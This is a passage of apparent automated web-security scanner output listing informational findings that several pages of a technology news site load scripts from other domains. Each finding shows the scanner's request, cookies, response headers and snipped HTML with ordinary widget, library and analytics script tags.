...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.363. http://technolog.msnbc.redacted/sony

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /sony

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sony HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:41:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152992

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.364. http://technolog.msnbc.redacted/steve-jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /steve-jobs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /steve-jobs HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=273
Date: Sun, 30 Jan 2011 02:49:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128432

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.365. http://technolog.msnbc.redacted/tablets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /tablets

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tablets HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:49:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147041

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.366. http://technolog.msnbc.redacted/technology

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /technology

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technology HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123475

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.367. http://technolog.msnbc.redacted/twitter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /twitter

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:34:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140628

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.368. http://technolog.msnbc.redacted/verizon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /verizon

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /verizon HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:38:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121979

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
